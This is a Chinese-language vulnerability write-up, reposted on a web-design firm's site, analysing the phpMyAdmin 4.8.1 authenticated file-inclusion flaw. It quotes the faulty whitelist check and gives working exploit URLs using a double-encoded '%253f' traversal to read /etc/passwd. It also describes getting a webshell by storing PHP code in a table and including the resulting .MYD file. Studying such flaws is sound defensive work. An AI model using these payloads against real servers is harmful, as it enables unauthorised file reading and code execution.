這篇文章給大家分享的是有關(guān)phpmyadmin 4.8.1任意文件包含的示例分析的內(nèi)容。小編覺得挺實用的，因此分享給大家做個參考，一起跟隨小編過來看看吧。

創(chuàng)新互聯(lián)公司專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè)、望城網(wǎng)絡(luò)推廣、成都小程序開發(fā)、望城網(wǎng)絡(luò)營銷、望城企業(yè)策劃、望城品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們最大的嘉獎；創(chuàng)新互聯(lián)公司為所有大學(xué)生創(chuàng)業(yè)者提供望城建站搭建服務(wù)，24小時服務(wù)熱線：028-86922220，官方網(wǎng)址：jinyejixie.com

phpmyadmin 4.8.1任意文件包含

0x00 phpmyadmin簡述

phpMyAdmin 是一個以PHP為基礎(chǔ)，以Web-Base方式架構(gòu)在網(wǎng)站主機上的MySQL的數(shù)據(jù)庫管理工具，讓管理者可用Web接口管理MySQL數(shù)據(jù)庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優(yōu)勢在于由于phpMyAdmin跟其他PHP程式一樣在網(wǎng)頁服務(wù)器上執(zhí)行，但是您可以在任何地方使用這些程式產(chǎn)生的HTML頁面，也就是于遠端管理MySQL數(shù)據(jù)庫，方便的建立、修改、刪除數(shù)據(jù)庫及資料表。也可借由phpMyAdmin建立常用的php語法，方便編寫網(wǎng)頁時所需要的sql語法正確性。

0x01 影響版本

phpmyadmin 4.8.1
之前的版本沒有測試
注:需要登錄phpmyadmin才可利用

0x02漏洞分析

查看index.php 55~63行代碼

if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

條件為真（條件）：

1. $_REQUEST['target'] 不能為空

2. $_REQUEST['target'] 是字符串

3. $_REQUEST['target'] 不能以index開頭

4. $_REQUEST['target'] 不能在$target_blacklist；而$target_blacklist = array ('import.php', 'export.php');

5. 需要滿足Core::checkPageValidity($_REQUEST['target'])

Core::checkPageValidity($_REQUEST['target'])，查看phpMyAdmin1\libraries\classes\core.php
checkPageValidity 函數(shù)具體代碼：

public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

出現(xiàn)問題的代碼：

$_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

在請求的鏈接中包含%253即可繞過，那可以構(gòu)造的鏈接有：
db_sql.php%253/../../../../../../etc/passwd
db_sql.php可以替換成一下：

'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',

0x03通過文件包含獲取webshell

前提條件首先知道數(shù)據(jù)庫的路徑

查看當(dāng)前數(shù)據(jù)庫的路徑：

show variables like 'datadir'

我新建了一個數(shù)據(jù)庫 tt，在tt數(shù)據(jù)庫中添加一個了表，在表中插入了<?php phpinfo()?>
然后訪問：http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD

感謝各位的閱讀！關(guān)于“phpmyadmin 4.8.1任意文件包含的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，讓大家可以學(xué)到更多知識，如果覺得文章不錯，可以把它分享出去讓更多的人看到吧！

網(wǎng)站標(biāo)題：phpmyadmin4.8.1任意文件包含的示例分析
網(wǎng)站URL：http://jinyejixie.com/article24/ppshje.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供搜索引擎優(yōu)化、Google、網(wǎng)站維護、定制網(wǎng)站、微信小程序、App設(shè)計

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)